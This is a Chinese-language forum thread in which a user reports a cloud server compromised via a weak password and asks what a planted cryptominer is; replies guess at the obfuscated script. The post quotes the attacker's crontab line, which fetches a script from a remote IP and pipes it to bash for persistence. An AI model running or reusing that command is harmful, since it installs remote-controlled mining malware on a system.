腾讯云小主机被入侵部了一个挖矿程序

2020-01-16 20:23:36 +08:00
 wmhx

好久没登录了, 今天发现很卡,就发现有个简单密码的用户的 crontab 被改了执行一个 msr 程序:

crontab -l: */15 * * * * [ "$(ps -fe|grep msr|grep -v grep|wc -l)" -eq 0 ] && wget -qO - http://185.43.207.36/.d/test.sh | bash @reboot [ "$(ps -fe|grep msr|grep -v grep|wc -l)" -eq 0 ] && wget -qO - http://185.43.207.36/.d/test.sh | bash

那个 test.sh 可以下载,没看懂内容, 只知道执行了一个 msr 的程序特别耗 CPU;

没看出来这是啥东西. 谁帮忙给介绍下.

2611 次点击
所在节点    分享发现
3 条回复
opengps
2020-01-16 21:11:26 +08:00
不知道是种什么脚本,不知道执行的程序是不是通过脚本下载的
neighbads
2020-01-17 09:17:40 +08:00
前面就是一堆变量, 第二行 展开后是

echo “$s 的 base64 编码” | rev |base64 -d

然后得到的一堆再 eval、里面有 msr 的下载,写的乱糟糟

yanheqi
2020-01-19 02:19:50 +08:00
为什么会被入侵?密码太简单被破解?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/638543

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX